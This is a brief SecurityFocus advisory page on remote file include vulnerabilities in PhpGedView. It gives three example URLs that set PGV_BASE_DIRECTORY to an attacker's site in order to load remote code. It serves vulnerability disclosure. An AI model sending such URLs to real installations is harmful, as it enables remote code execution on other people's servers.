PhpGedView Multiple PHP Remote File Include Vulnerabilities

The following examples were provided:

http://www.example.com/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker's_site]


 

Privacy Statement
Copyright 2010, SecurityFocus